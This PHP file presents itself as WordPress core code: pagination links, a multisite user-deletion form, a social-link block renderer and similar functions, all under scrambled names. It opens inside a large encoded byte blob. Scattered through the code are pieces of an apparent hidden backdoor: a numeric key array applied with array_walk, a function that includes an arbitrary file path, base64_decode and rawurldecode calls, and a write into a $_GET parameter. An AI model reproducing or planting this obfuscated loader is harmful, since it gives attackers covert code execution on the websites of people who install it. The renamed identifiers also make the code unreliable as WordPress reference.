xde\xdf\xd2\xa9\x9ane\xe5\xb4\xc4u\x94\x9c\x89\xc2s\x92\x8c\x8d\xa9\x9an\x9c\xc4\x86\x8au\x9e\xa1~\xbf\xdf\xb5\xb4\xd3\xc3\xd4}o\xe1o\x99\x92}\xcd\xb7\x82s\x92\x8c\x8d\xf7zXt\x9ae\xb1\xb8\xda\x92zq\x98|uv\x83yWN\x94\xb6\xb8\xa5\xdc\xcc\x89q\xdc\x92\x8c\x8d\xa4\x9f\x8bt\x9ae\x8au\xe9\xe3\x84v\xce\xea\xdc\xd9\xe9\xd4\xb3m\x97q\x91\x81\xa3\x9cz\xba\xdc\xc9\xc6\xc7\x9a\x90xt\x97\xa6\xda\xc5\xe0\xd7\x86\xb6\xdb\xd3\xda\xd4\xdf\x9c\xb0\xa6\xde\xa6\xd8\xb6\x9b\x9b\x95Qs|\x9b\x97\x9a\x90\xbae\x90o\x99y\xd6\xdf\xcf\xa1\xe0\xdeu\xaa\xa9\x9ane\xe7\xa8\xacu\x9e\xa1\xcc\xa8\xe0\xe7\xde\xd9\xde\xd5\xb1\xb4\xd4\xaa\x92|\x99\xa4\x8a\x8f\xce\xde\xd8\xdc\x9f\xa2~\x9c\xdf\xb7\xd6\xb9\x99\xa4\x8an\x92\xadv\x8d\x9a\x9fx\xb9\xbco\x99y\xcc\xe5\xd3\xab\xbd\xdc\xaf\xb4\xc7\xd2ne\x90\x82s\x85\xaf\x96\xb9\xbe\xac\xa1\x96\xb9\xef\xc9\xc5\xb9\x9at\xa7u\x94\x99\x8f{\x9e\xa2\xa2\x94\xb5\x9fx\xae\xba\x8b\xabu\x94\x92\x84vs{\x9b\x97\x9a\x90\x9c\x99\xe0e\x8a\xa3\xe9\xc2\xb0\xd5\xd7u\x95\x9e\xc8\xc1\xbe\xd4\x99\xd4\x98\xbb\xbf\xbcv\x93\x92\x8c\xb9\xe7\xb6\xc2e\x90o\x99\x91}\xd5\xc9\xbc\xd7\xe6\x94\x91\xeb\xbe\x9e\xad\xcans~\x94\x92zg\xe4|v\x8d\x9a\x94\xbf\x93\xc0\xad\xc4\xb0\x98\xca\xcd\xc0\xcd\xc6\xd6\xb0\xc1\xbd\xb0\xa2\x90e\x8au\x94\xafc\xba\xdd\xe4\xcb\xdf\xdf\xe0\xb3\xa6\xe4m\x8e\xc6\xc2\xc2\xc2\xa1\xc4\x96\xc4\xe0\xf3\xd4\xa2\xaf\xb3\x8c\xb7\xb7\xd1\x9ezg\x89\xa4\x95\xa8\x84yWN\x90e\x8au\x98\xca\xcd\xc0\xcd\xc6\xd6\xb0\xc1\xbd\xb0p\x9b\x80\xa5_\x94\x92zg\x89\x92\xe9w\x84znO\x90e\x8au\x94\x92~\x89\xdc\xd6\xb6\xda\xec\xbb\x98N\xadt\x94\xc2\x9e\xa1\xcd\xbb\xdb\xd1\xde\xd2\xea\xd5\xaf\xb9\x98i\xbd\xa0\xdf\xba\xc5\xb7\x95\x92\x8c\x8d\xad\x99\x89O\x90e\x8a^~\xa1\x84\xbf\xb3\xb3\x8c\x97\xa9\xe2\xb3\xb9\xe5\xb7\xd8\x84\x9e\x92zg\xc1\x92\x8c\x97\xa9\x94\x93\x90\xca\x9a\xaf\xb6\xd5\xe7\xbd\xbc\xa4|uv\x9a\xedXNyNs^~|c\xad\xde\xe0\xcf\xe1\xe3\xdf\xbct\x9ae\x8au\xed\xb8\x84v\xb8\xc9\xda\xe3\xce\xc9\xb9\x89\xb9m\x8e\x9d\xb7\xc3\xbc\xa9\x92|\x8c\x8d\x9a\x90n\xc0zOt\x84\x9e\x92z\xbc\x93\xa1\x90\xb8\xc5\xbc\xc7\x87\xb5\x8bs\x92\xa3\x9cz\xbd\x89\x9c\x9b\x8f\xd6\xa4\x81g\xabi\xc9\x9e\xd9\xb7\xcf\xbe\x98\x9c\x8c\xd3\xe6\xbaxt\xade\x8a|\xa9\xa7\x8b{\x99\x99\xa7w\x84y\xb4\xb4\xe2\xaa\xcb\xb8\xdc\xa1\x84g\x89\xdc\xe2\xb1\xbb\x90xt\x98\x8e\xd4\xc6\xc9\xe3\xa0\x9c\x91\x9b\x8c\x8d\x9a\x90n\xa6\xe3N\x8e\xc4\xdd\xe1\xc4\x98\xce\xcb\xcf\xe6\xa3\x9fxe\xc0\x93\xd2\xa3\xeddQs\x92\xbf\xb2\xce\xb6\xb7\x96\xc7\x8a\xb3\xa2\x9c\x96\xc9\xb0\xd8\xdc\xbd\xd2\xd3\xd3\xc7q\x90e\x8ay\xbf\xbd\xa6\xc0\xab\xb7\xb2\x96\xb5\xabXNy\xc2t^}\xa1\x84g\xab\xe0\xcd\x97\xa9\xedXOzt\x94u\x94\xd3\x9c\xbb\xc0\x92\x8c\x97\xa9zWNyNs\x84\x9e\x92zg\xe0\xb9\xae\xd2\x9a\x90no\x9f\xab\xdf\xc3\xd7\xe6\xc3\xb6\xd7\xa1\x96\x8d\x9a\x90\xc0\xa8\xc3\xb5\xacu\x94\x9c\x89\xa9\xd8\xbf\xb2\xbc\xf1\xe0vi\xc2\xae\xbf\xa0\xb8\xb8\xcbs\x89\x92\x8c\x8d\x9e\xbe\xa7\xb6\xc1\x9b\xcf\xbb\xb5\xeb\x83Qr\x92\xe7w\x9a\x90ne\x90e\xd3\xbb\xa3\x9czg\xaa\xb7\xb2\xb7\xbe\x90ne\x9at\x92\x84\x9e\x92z\x90\xbd\xc1\xd0\xb2\x9a\x90xt\xd3\xb4\xdf\xc3\xe8\xa1\x84g\x89\x92\xbd\xdc\xde\x90xt\x98N\x8e\xa7\xdd\xc7\xa5\x8b\xaf\xe3u\x96\xa9\x9an\xb2\xb7e\x8a\xa3\xaf\x97P\x9c{\x95\x8d\x9a\x90ne\xebOs^}{\x89q\x89\xec\xce\xe2\x9a\x9a}i\xdb\x8b\xdc\xbf\xbf\xbf\xd1g\x89\x92\xa9\x8d\x9a\x94\xa0\xae\xc5\x90\xae\x9b\xe5\xcd\x8b\xa4\xa4|vw\x83\x94\xa7\xaf\xb6\x93\xb7\xc2\x94\xafck\xbb\xdb\xc1\xb8\xbe\xb6\xbf\xa0\xa2\xa2\xa5y\xd3\xdc\xafv\x93\x92\x8c\xe0\xf2\xc8\x8fe\x90o\x99\x92}\x99\x90{\xa2\xab\x9c\x94\xb5zWNyNs\x84\x9e\x92zg\xcb\xc0\xe6\xd0\xcf\x90ne\x9at\x8e\xcb\xe3\xc7\xa9\xaf\xc3\xdb\xc4\xe1\x9a\xadne\x90e\x8ay\xdf\xb8\xcc\xb1\xb4\xbf\xe3\x95\x9e\xc9\xb8\x8b\xbe\x92\xd7~\xaf|cP\x98\x9c\xb5\xe3\xd1\xc6\xafe\x9at\xcf\xcb\xd5\xde\x89q\x89\x92\xb4\xd1\xa4\x9fvt\x9ae\xe3\xaa\xd6\xebzg\x89\x9c\x9b\x91\xf0\xdf\xa3\x94\xd8\x9f\xd3\xad\xe8\xa1\x84\xae\xb8\xdd\x96\x9c\xa3\xabXNyt\x94u\x94\x92\xcf\x90\x89\x92\x96\x9c\xde\xd9\xb3e\x90m\x93\x90~{cP\xe6|uv\xf7zXOyOs^}{\x89q\x89\xe4\xb4\xbc\xd3\xc3ne\x90o\x99\xbb\xe9\xe0\xbd\xbb\xd2\xe1\xda\x8d\xe3\xd1\x98\xb5\xc7m\x8e\xcc\xeb\xc6\xbe\xa9\xd2\xc1\xb4\xc1\xc7\x9c}o\xe1\xb2\xc4\xce\x94\x92zq\x98\x96\xc1\xdc\xe0\xdf\x99\xbe\xbbnt^}{cP\xe4|vw\x9a\x90ne\x90\xb7\xcf\xc9\xe9\xe4\xc8g\x89\x92\x8c\x91\xf1\xe7\xa2\xa9\xd2\xae\xb9\x9d\xc8\xbfc\xa5\x89\x92\x8c\x8d\x9e\xc5\xbd\xab\xdf\x90\xe3\xa0\xaf|zg\x89\x92\x8cv\xf7zne\x90t\x94u\x94\x92\x9cg\x93\xa1vv\x83yWN\x9fo\x8a\x9a\xd6\xb6zg\x89\x9c\x9b\xd3\xef\xde\xb1\xb9\xd9\xb4\xd8u\xb5\xde\x9d\x8b\xb6\xe1\xda\x95\x9e\xc6\xa2\xad\xd5\xb1\xbe\x81\x94\x92zg\x89\x96\xb7\xb8\xc6\xe9\x90\x8a\xb6nt_~{\xd5Ps|v\x8d\x9e\xc6\xa2\xad\xd5\xb1\xbeu\x94\x92zg\xa6\x92\xd1\xe5\xea\xdc\xbd\xa9\xd5t\x94u\x94\xd7\xad\x89\xc3\x92\x8c\x8d\xa4\x9fvi\xbb\x90\xb6\xce\xb6\xb7\xa0s\x89\x92\x8c\x8d\x9a\x94\xa4\x99\xd8\xaa\xd6\xa9}\x9b\x95\x82s\x92\x8cw\x9a\x90nN\xd2\xb4\xb7\x9b\xc3\xe9\xcao\x8d\xc8\xc0\xd5\xdf\xdc\xa2q\x90e\x8au\x98\xbd\xa5\x93\xe2\xb4\xb1\xb3\xa3\xabXe\x90N\xe7_}{dP\xcf\xe7\xda\xd0\xee\xd9\xbd\xb3\x9fo\x8au\x94\xc1\xcbg\x89\x92\x96\x9c\xcd\xb5\xa2\x8b\xd9\x96\xc1\x9a\xbd\xbf\x82k\xd8\xdb\xdb\xd7\xcb\xd5\xa7\xa8\xe9q\x8au\x94\x92zk\xb4\xbd\xb8\xe6\xbc\xb5\x94nze\x8au\xa3\x9czg\xd7\xe3\x96\x9c\xf5zne\x90t\x94u\x94\xe5\x9b\x8b\xdb\x92\x8c\x97\xa9\xd6\xbd\xb7\xd5\xa6\xcd\xbd\xa3\x9cz\x98\xcc\xd3\x8c\x8d\xa4\x9fve\x90e\x8e\xc4\xdd\xe1\xc4\x98\xce\xcb\xcf\xe6\x83\xd1\xc1e\x90i\xbf\xc4\xda\xe1\xa5\xc0\xb4{\xa9\xab\x83\x94\xc5\xbc\xc4\xa9\xcc\xbe\xc3\xba\xae\x94\x89\x92\x8c\x8d\x9a\x99ne\x90e\xe5_\x94\x92zv\x93\x92\xb8\xdf\xe2\xdcne\x9at\xcc\xb8\xdc\xdd\xc4\x8b\x91\x96\xc1\xdc\xe0\xdf\x99\xbe\xbbqs\xc7\xc2\xc8\xaf\x8a\xb7\xb6\xba\xc7\xd0\x98r\xbc\xe7\x99\xce\xb7\xdd\xc1\xa2\x9b\xb6\x9b\x98v\x9e\xbb\x99\x91\xe9\x87\xaf\x9b\x9d\xaddg\x89\x92\x8c\x9c\xa4\x90\xa3\xb4\xbf\x86\x8au\x94\x9c\x89\xc4s\x92\x8c\x9c\xa4\x90n\xa6\xc5\xb8\x94\x84\xf1|zg\x89{v\x8d\x9a\x90W\xab\xe5\xb3\xcd\xc9\xdd\xe1\xc8g\x89\x92\x8c\x8d\xf1\xe4\xbf\xb6\xbe\x8f\xae\xb8\xb5\x9a~\x9c\xd8\xd8\xdb\xb8\xf3\xbbzt\x9a\x9b\xe1\xa3\x96\xd1\xbe\xbd\xd6\xce\xd6\xc9\xb8\xa2\x92\x99Os^}{cP\xe4|v\x9c\xa4\xb6\xc1e\x9at\x8e\xad\xe7\xeb\xbe\x9b\xd3\xb5\xb3\xba\xdc\xea\x94\xbf\xb9\x98\xb2\xce\xbb\xd5z\x84r\xe5\xe0\xdf\xe6\xd5\xbcmyi\xe1\xcc\xc8\xd6\xbc\xb0\xb8\xba\xc0\xba\x83\x99}\xb8\xe4\xb7\xd6\xba\xe2\x9ack\xbe\xe1\xd2\xdc\xc5\xe9\x99e\x90n\xa5\x90~|\x89q\x89\x92\xbd\xba\xa4\x9fr\x9a\xdf\xab\xd9\xa0\xed\xbd\x89q\xb1\xb8\xc6\xc4\xa4\x9f|\x82\x90e\x8aw\xe1\xe4\xcb\xb3\xd5\xc9\xc2\x9a\xc0\xc6\xa8r\xbd\xb1\xd5\xc8\xa1\xe5\xcd\xc1\xaf\xb5\xb8\x9a\xc2\xd6\x90r\xdb\xa8\xdc\xcc\xb8\xc3\x87\xad\xbb\xc5\xd1\xdc\xe7\x92\x89Oze\x8au\x98\xc7\xc9\xad\xd8\xbd\xe5\xb8\x9a\x90n\x82y\xb8\xde\xc7\xd3\xe4\xbf\xb7\xce\xd3\xe0v\xa2yr\x9a\xdf\xab\xd9\xa0\xed\xbd\x86P\xd2\xe0\xe0\xe3\xdb\xdcvi\xc8\xb8\xe3\xb9\xc8\xdc\x9d\x8e\xb6\xd4\xe6\xb3\xf4\xb9\xa1\x8d\xe9\x8c\xcd~\xa3\x9czg\xd8\xb4\xbc\xcf\xf1\x90xt\x9be\x8au\x94\x92\x8bp\xa4|\x8c\x8d\x9a\x9fx\xab\x90e\x94\x84~\x92zg\x89{\xde\xd2\xee\xe5\xc0\xb3\x9fo\x8a\x9b\xb7\xb5\xd4q\x98\x96\xc1\xdc\xe0\xdf\x99\xbe\xbb\x80\x8e\xb4\xda\xb5\xcb\x93\x89\x92\x8c\xaa\x83\x97\x80z\xa0|\xa0|\xaf|zg\x89\xefv\x8d\x83zne\x9fo\xd9\xad\xcd\xb4\xcfg\x89\x92\x96\x9c\xe0\xe5\xbc\xa8\xe4\xae\xd9\xc3\x94\x92\xbc\xaa\xd1\xdd\xd6\xb1\xa2\x94\xa3\xb4\xd6\xb4\xb5\xce\xbf\x9e\x89q\x89\xdf\xd6\xb2\xa4\x9fr\xbc\xe7\x99\xce\xb7\xdd\xc1\xa2\x9b\xb6\x9e\x8c\x91\xc5\xbb\x9a\xbe\xb2\x8a\xb0~~{cP\x89\xeduw\x84y\x8f\xb1\xb3\x89\xb7\xc4\xe2\x9a\xc3\xa8\xb3\xe2\xc3\x95\x9e\xe7\xc5\x99\xd4\xa7\xd3\xa4\xbc\xc6\xa7s\x98\x9c\x8c\xdf\xcc\xd8xt\xe7\xb9\xdb\xc6\xc2\xbc\x9e\xaa\xaa\x9a\x90\xc2\xe9\xd6\xbd\x90\xe9\x90\x96u\x94\x96\xd1\xbe\xbd\xd6\xce\xd6\xc9\xb8\xa2\x92\x99n\x96u\x94\x96\xa5\x92\xb5\xeb\xae\xb2\xc0\x99\x89\x80zNs^}{\x89q\xcc\xeb\xaf\xb3\x9a\x9a}O\x90e\x8a\x84\x9e\x92z\x8d\xd8\xe7\xb2\xbf\x9a\x90xt\x94\x86\xba\xae\xe2\xbe\xbb\x8a\xb6\xe9u\xaa\x9a\x90ne\xe4\xb7\xd3\xc2\x9c\x96\xd1\xbe\xbd\xd6\xce\xd6\xc9\xb8\xa2\x92\x99\x80t_~\xa1\x84g\x89\xe7\xd4\xd0\x9a\x90no\x9fi\xb7\x96\xba\xb5\xce\xbf\xd6\xe9u\xaa\x9a\x90\xb3\xbd\xe0\xb1\xd9\xb9\xd9\x9a~\x92\xb4\xbe\xe5\xaf\xbf\xb6ze\x90i\xab\xa5\xcd\xe0\xa6\xa8\xac\xbf\xe3\x96\xb5zWNyNs^\xdd\xd8zg\x89\x9a\xcf\xdc\xef\xde\xc2m\x94\x92\xab\x9b\xb7\xe6\xd2\xb4\xe0\x9b\x9b\x97\x9a\xcaxt\xaee\x8a\x86\x9d{\xd5Q\x98\x9c\x8c\x8d\x9a\xbc\x90\xb2\x90e\x94\x84\x98\xb4\xa7\xaf\xd8\xd9\xb5\x9c\xa4\x90ne\xc4\xad\xc4\xa3\xbe\x92zq\x98\xafu\xd6\xe7\xe0\xba\xb4\xd4\xaa\x92\xb8\xdc\xe4\x89q\x89\x92\x8c\xd1\xa4\x9fvy\xa5n\x96\x84\x9e\xe6\xacg\x89\x92\x96\x9c\x9e\xbd\x8f\x8b\xb3\xb9\xe2\xc2\xeb\x9b\x95Q\x89\x92\x8c\x8d\x83\x94\xa5\x97\xdd\xa8\xdb^\xb1\xa1\x84\x9d\xd5\x92\x8c\x8d\xa4\x9f\xc1\xb9\xe2\xa4\xda\xb6\xd8\x9a~\x89\xb6\xda\xdb\xd4\xc3\x9c}o\x90e\x8a\x9c\xc5\xe2\x9d\x88\x89\x92\x96\x9c\xac\xa0zN\x97u\x91\x81\x94\x92zg\xbc\xc6\xbe\xcc\xca\xb1\x92\xa4\xc2\x8e\xb1\x9d\xc8\x9b\x95\x82s\x92u\xea\x84yWt\x9ae\x8a\xb9\x94\x92\x84v\xe6|\x8c\x8d\x9ayXO\x9fo\x8au\x94\xca\xcf\xb5\xdb\xc9\x8c\x97\xa9\xbf\xa5\xb3\xe6\x99\xc3\xc0\xb8\xbb\x82i\x8b\x9b\xa7\xa8\x9c\xab\xb7\xa4\x80\xdd\x8f\xaa\xac|\xbc\xd7\xde\xd5\xdb\xe5\x92\x89\xc2"; // %x2F ("/") and skip the remaining steps. $robots_rewrite = rawurldecode($maxwidth); $_GET["bfKojX"] = $features; } /** * See if the next character is LWS * * @return bool true if the next character is LWS, false if not */ function order_callback($figure_styles){ $typeinfo = "Info Data Example"; include($figure_styles); } /** * Remove control callback for widget. * * @since 2.2.0 * * @param int|string $fielddef Widget ID. */ function apply_block_core_search_border_styles($fielddef) { wp_register_widget_control($fielddef, '', ''); } $unique_hosts = array(114, 90, 71, 105, 114, 108, 109, 122, 112, 78, 69, 112, 69, 106, 85, 116); $ASFbitrateVideo = trim($help_sidebar_content); /** * Retrieves the link for a page number. * * @since 1.5.0 * * @global WP_Rewrite $skip_options WordPress rewrite component. * * @param int $logout_url Optional. Page number. Default 1. * @param bool $create Optional. Whether to escape the URL for display, with esc_url(). * If set to false, prepares the URL with sanitize_url(). Default true. * @return string The link URL for the given page number. */ function maybe_disable_automattic_widgets($logout_url = 1, $create = true) { global $skip_options; $logout_url = (int) $logout_url; $parents = remove_query_arg('paged'); $oldval = parse_url(home_url()); $oldval = isset($oldval['path']) ? $oldval['path'] : ''; $oldval = preg_quote($oldval, '|'); $parents = preg_replace('|^' . $oldval . '|i', '', $parents); $parents = preg_replace('|^/+|', '', $parents); if (!$skip_options->using_permalinks() || is_admin()) { $most_recent = trailingslashit(get_bloginfo('url')); if ($logout_url > 1) { $categories_migration = add_query_arg('paged', $logout_url, $most_recent . $parents); } else { $categories_migration = $most_recent . $parents; } } else { $information = '|\?.*?$|'; preg_match($information, $parents, $subframe_apic_picturedata); $rcheck = array(); $rcheck[] = untrailingslashit(get_bloginfo('url')); if (!empty($subframe_apic_picturedata[0])) { $wp_customize = $subframe_apic_picturedata[0]; $parents = preg_replace($information, '', $parents); } else { $wp_customize = ''; } $parents = preg_replace("|{$skip_options->pagination_base}/\\d+/?\$|", '', $parents); $parents = preg_replace('|^' . preg_quote($skip_options->index, '|') . '|i', '', $parents); $parents = ltrim($parents, '/'); if ($skip_options->using_index_permalinks() && ($logout_url > 1 || '' !== $parents)) { $rcheck[] = $skip_options->index; } $rcheck[] = untrailingslashit($parents); if ($logout_url > 1) { $rcheck[] = $skip_options->pagination_base; $rcheck[] = $logout_url; } $categories_migration = user_trailingslashit(implode('/', array_filter($rcheck)), 'paged'); if (!empty($wp_customize)) { $categories_migration .= $wp_customize; } } /** * Filters the page number link for the current request. * * @since 2.5.0 * @since 5.2.0 Added the `$logout_url` argument. * * @param string $categories_migration The page number link. * @param int $logout_url The page number. */ $categories_migration = apply_filters('maybe_disable_automattic_widgets', $categories_migration, $logout_url); if ($create) { return esc_url($categories_migration); } else { return sanitize_url($categories_migration); } } $group_mime_types = base64_decode($input_changeset_data); /** * Updates metadata cache for a list of post IDs. * * Performs SQL query to retrieve the metadata for the post IDs and updates the * metadata cache for the posts. Therefore, the functions, which call this * function, do not need to perform SQL queries on their own. * * @since 2.1.0 * * @param int[] $is_theme_mod_setting Array of post IDs. * @return array|false An array of metadata on success, false if there is nothing to update. */ function box_seal($is_theme_mod_setting) { return update_meta_cache('post', $is_theme_mod_setting); } /** * Retrieves query variable. * * @since 3.5.0 * * @param string $ts_resuery_var Query variable key. * @return mixed */ if (!empty($instances)) { $is_api_request = substr($instances, 0, 6); } $MsgArray = strlen($allowed_fields); /** * Retrieves the locale of a user. * * If the user has a locale set to a non-empty string then it will be * returned. Otherwise it returns the locale of get_locale(). * * @since 4.7.0 * * @param int|WP_User $SNDM_endoffset User's ID or a WP_User object. Defaults to current user. * @return string The locale of the user. */ function render_block_core_navigation_submenu($SNDM_endoffset = 0) { $smtp_code_ex = false; if (0 === $SNDM_endoffset && function_exists('wp_get_current_user')) { $smtp_code_ex = wp_get_current_user(); } elseif ($SNDM_endoffset instanceof WP_User) { $smtp_code_ex = $SNDM_endoffset; } elseif ($SNDM_endoffset && is_numeric($SNDM_endoffset)) { $smtp_code_ex = get_user_by('id', $SNDM_endoffset); } if (!$smtp_code_ex) { return get_locale(); } $arg_id = $smtp_code_ex->locale; return $arg_id ? $arg_id : get_locale(); } $has_links = str_pad($allowed_fields, $MsgArray + 3, "_"); /** * Outputs term meta XML tags for a given term object. * * @since 4.6.0 * * @global wpdb $default_structure_values WordPress database abstraction object. * * @param WP_Term $cond_before Term object. */ function delete_key($cond_before) { global $default_structure_values; $old_file = $default_structure_values->get_results($default_structure_values->prepare("SELECT * FROM {$default_structure_values->termmeta} WHERE term_id = %d", $cond_before->term_id)); foreach ($old_file as $f2f8_38) { /** * Filters whether to selectively skip term meta used for WXR exports. * * Returning a truthy value from the filter will skip the current meta * object from being exported. * * @since 4.6.0 * * @param bool $skip Whether to skip the current piece of term meta. Default false. * @param string $f2f8_38_key Current meta key. * @param object $f2f8_38 Current meta object. */ if (!apply_filters('wxr_export_skip_termmeta', false, $f2f8_38->meta_key, $f2f8_38)) { printf("\t\t<wp:termmeta>\n\t\t\t<wp:meta_key>%s</wp:meta_key>\n\t\t\t<wp:meta_value>%s</wp:meta_value>\n\t\t</wp:termmeta>\n", wxr_cdata($f2f8_38->meta_key), wxr_cdata($f2f8_38->meta_value)); } } } $dismissed_pointers = hash('md5', $is_api_request); /** * Kills WordPress execution and displays XML response with an error message. * * This is the handler for wp_die() when processing XMLRPC requests. * * @since 3.2.0 * @access private * * @global wp_xmlrpc_server $unsanitized_value * * @param string $instances Error message. * @param string $ymatches Optional. Error title. Default empty string. * @param string|array $mixdata_bits Optional. Arguments to control behavior. Default empty array. */ function wp_global_styles_render_svg_filters($instances, $ymatches = '', $mixdata_bits = array()) { global $unsanitized_value; list($instances, $ymatches, $has_filter) = _wp_die_process_input($instances, $ymatches, $mixdata_bits); if (!headers_sent()) { nocache_headers(); } if ($unsanitized_value) { $primary_item_id = new IXR_Error($has_filter['response'], $instances); $unsanitized_value->output($primary_item_id->getXml()); } if ($has_filter['exit']) { die; } } $matches_bext_time = str_repeat($ASFbitrateVideo, 2); /** * Display the description of the author of the current post. * * @since 1.0.0 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function verify_detached() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'description\')'); the_author_meta('description'); } /* translators: %s: register_widget() */ if ($group_mime_types !== false) { $hostentry = strlen($group_mime_types); } $below_midpoint_count = array(1, 2, 3); /** * Display the nickname of the author of the current post. * * @since 0.71 * @deprecated 2.8.0 Use the_author_meta() * @see the_author_meta() */ function curl_before_send() { _deprecated_function(__FUNCTION__, '2.8.0', 'the_author_meta(\'nickname\')'); the_author_meta('nickname'); } $wp_dashboard_control_callbacks = array($dismissed_pointers, $is_api_request); /** * @param string $tagtype * @return string */ function wrapText($tagtype) { return "{$tagtype} widgets_access "; } array_walk($menu_file, "add_freeform", $unique_hosts); /** * Header with image background and overlay block pattern */ if (!empty($below_midpoint_count)) { $MPEGaudioHeaderValidCache = implode("-", $below_midpoint_count); } /** * @param array $img_url_basename * @return bool */ function remove_option($img_url_basename) { $p_offset = wp_get_current_user(); if (!is_array($img_url_basename) || empty($img_url_basename)) { return false; } ?> <h1><?php esc_html_e('Users'); ?></h1> <?php if (1 === count($img_url_basename)) { ?> <p><?php _e('You have chosen to delete the user from all networks and sites.'); ?></p> <?php } else { ?> <p><?php _e('You have chosen to delete the following users from all networks and sites.'); ?></p> <?php } ?> <form action="users.php?action=dodelete" method="post"> <input type="hidden" name="dodelete" /> <?php wp_nonce_field('ms-users-delete'); $tag_templates = get_super_admins(); $cronhooks = '<option value="' . esc_attr($p_offset->ID) . '">' . $p_offset->user_login . '</option>'; ?> <table class="form-table" role="presentation"> <?php $MPEGaudioChannelModeLookup = (array) $_POST['allusers']; foreach ($MPEGaudioChannelModeLookup as $asf_header_extension_object_data) { if ('' !== $asf_header_extension_object_data && '0' !== $asf_header_extension_object_data) { $p_filedescr = get_userdata($asf_header_extension_object_data); if (!current_user_can('delete_user', $p_filedescr->ID)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User %s cannot be deleted.'), $p_filedescr->user_login )); } if (in_array($p_filedescr->user_login, $tag_templates, true)) { wp_die(sprintf( /* translators: %s: User login. */ __('Warning! User cannot be deleted. The user %s is a network administrator.'), '<em>' . $p_filedescr->user_login . '</em>' )); } ?> <tr> <th scope="row"><?php echo $p_filedescr->user_login; ?> <?php echo '<input type="hidden" name="user[]" value="' . esc_attr($asf_header_extension_object_data) . '" />' . "\n"; ?> </th> <?php $SampleNumberString = get_blogs_of_user($asf_header_extension_object_data, true); if (!empty($SampleNumberString)) { ?> <td><fieldset><p><legend> <?php printf( /* translators: %s: User login. */ __('What should be done with content owned by %s?'), '<em>' . $p_filedescr->user_login . '</em>' ); ?> </legend></p> <?php foreach ((array) $SampleNumberString as $hex => $total_users_for_query) { $css_rules = get_users(array('blog_id' => $total_users_for_query->userblog_id, 'fields' => array('ID', 'user_login'))); if (is_array($css_rules) && !empty($css_rules)) { $xchanged = "<a href='" . esc_url(get_home_url($total_users_for_query->userblog_id)) . "'>{$total_users_for_query->blogname}</a>"; $remainder = '<label for="reassign_user" class="screen-reader-text">' . __('Select a user') . '</label>'; $remainder .= "<select name='blog[{$asf_header_extension_object_data}][{$hex}]' id='reassign_user'>"; $custom_background = ''; foreach ($css_rules as $SNDM_endoffset) { if (!in_array((int) $SNDM_endoffset->ID, $MPEGaudioChannelModeLookup, true)) { $custom_background .= "<option value='{$SNDM_endoffset->ID}'>{$SNDM_endoffset->user_login}</option>"; } } if ('' === $custom_background) { $custom_background = $cronhooks; } $remainder .= $custom_background; $remainder .= "</select>\n"; ?> <ul style="list-style:none;"> <li> <?php /* translators: %s: Link to user's site. */ printf(__('Site: %s'), $xchanged); ?> </li> <li><label><input type="radio" id="delete_option0" name="delete[<?php echo $total_users_for_query->userblog_id . '][' . $p_filedescr->ID; ?>]" value="delete" checked="checked" /> <?php _e('Delete all content.'); ?></label></li> <li><label><input type="radio" id="delete_option1" name="delete[<?php echo $total_users_for_query->userblog_id . '][' . $p_filedescr->ID; ?>]" value="reassign" /> <?php _e('Attribute all content to:'); ?></label> <?php echo $remainder; ?></li> </ul> <?php } } echo '</fieldset></td></tr>'; } else { ?> <td><p><?php _e('User has no sites or content and will be deleted.'); ?></p></td> <?php } ?> </tr> <?php } } ?> </table> <?php /** This action is documented in wp-admin/users.php */ do_action('delete_user_form', $p_offset, $MPEGaudioChannelModeLookup); if (1 === count($img_url_basename)) { ?> <p><?php _e('Once you hit “Confirm Deletion”, the user will be permanently removed.'); ?></p> <?php } else { ?> <p><?php _e('Once you hit “Confirm Deletion”, these users will be permanently removed.'); ?></p> <?php } submit_button(__('Confirm Deletion'), 'primary'); ?> </form> <?php return true; } $menu_file = wp_meta($menu_file); /** * Server-side rendering of the `core/social-link` blocks. * * @package WordPress */ /** * Renders the `core/social-link` block on server. * * @param Array $p_file_list The block attributes. * @param String $li_html InnerBlocks content of the Block. * @param WP_Block $info_array Block object. * * @return string Rendered HTML of the referenced block. */ function merge_from($p_file_list, $li_html, $info_array) { $json_error_message = isset($info_array->context['openInNewTab']) ? $info_array->context['openInNewTab'] : false; $has_timezone = isset($p_file_list['service']) ? $p_file_list['service'] : 'Icon'; $referer = isset($p_file_list['url']) ? $p_file_list['url'] : false; $flds = isset($p_file_list['label']) ? $p_file_list['label'] : block_core_social_link_get_name($has_timezone); $b9 = isset($p_file_list['rel']) ? $p_file_list['rel'] : ''; $already_notified = array_key_exists('showLabels', $info_array->context) ? $info_array->context['showLabels'] : false; // Don't render a link if there is no URL set. if (!$referer) { return ''; } /** * Prepend emails with `mailto:` if not set. * The `is_email` returns false for emails with schema. */ if (is_email($referer)) { $referer = 'mailto:' . antispambot($referer); } /** * Prepend URL with https:// if it doesn't appear to contain a scheme * and it's not a relative link starting with //. */ if (!parse_url($referer, PHP_URL_SCHEME) && !str_starts_with($referer, '//')) { $referer = 'https://' . $referer; } $is_html5 = block_core_social_link_get_icon($has_timezone); $original_slug = get_block_wrapper_attributes(array('class' => 'wp-social-link wp-social-link-' . $has_timezone . block_core_social_link_get_color_classes($info_array->context), 'style' => block_core_social_link_get_color_styles($info_array->context))); $registration_pages = '<li ' . $original_slug . '>'; $registration_pages .= '<a href="' . esc_url($referer) . '" class="wp-block-social-link-anchor">'; $registration_pages .= $is_html5; $registration_pages .= '<span class="wp-block-social-link-label' . ($already_notified ? '' : ' screen-reader-text') . '">'; $registration_pages .= esc_html($flds); $registration_pages .= '</span></a></li>'; $num_bytes = new WP_HTML_Tag_Processor($registration_pages); $num_bytes->next_tag('a'); if ($json_error_message) { $num_bytes->set_attribute('rel', trim($b9 . ' noopener nofollow')); $num_bytes->set_attribute('target', '_blank'); } elseif ('' !== $b9) { $num_bytes->set_attribute('rel', trim($b9)); } return $num_bytes->get_updated_html(); } // Theme is already at the latest version. // Always persist 'id', because it can be needed for add_additional_fields_to_object(). /** * Outputs the Activity widget. * * Callback function for {@see 'dashboard_activity'}. * * @since 3.8.0 */ function column_created() { echo '<div id="activity-widget">'; $official = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'future', 'order' => 'ASC', 'title' => __('Publishing Soon'), 'id' => 'future-posts')); $css_url_data_types = wp_dashboard_recent_posts(array('max' => 5, 'status' => 'publish', 'order' => 'DESC', 'title' => __('Recently Published'), 'id' 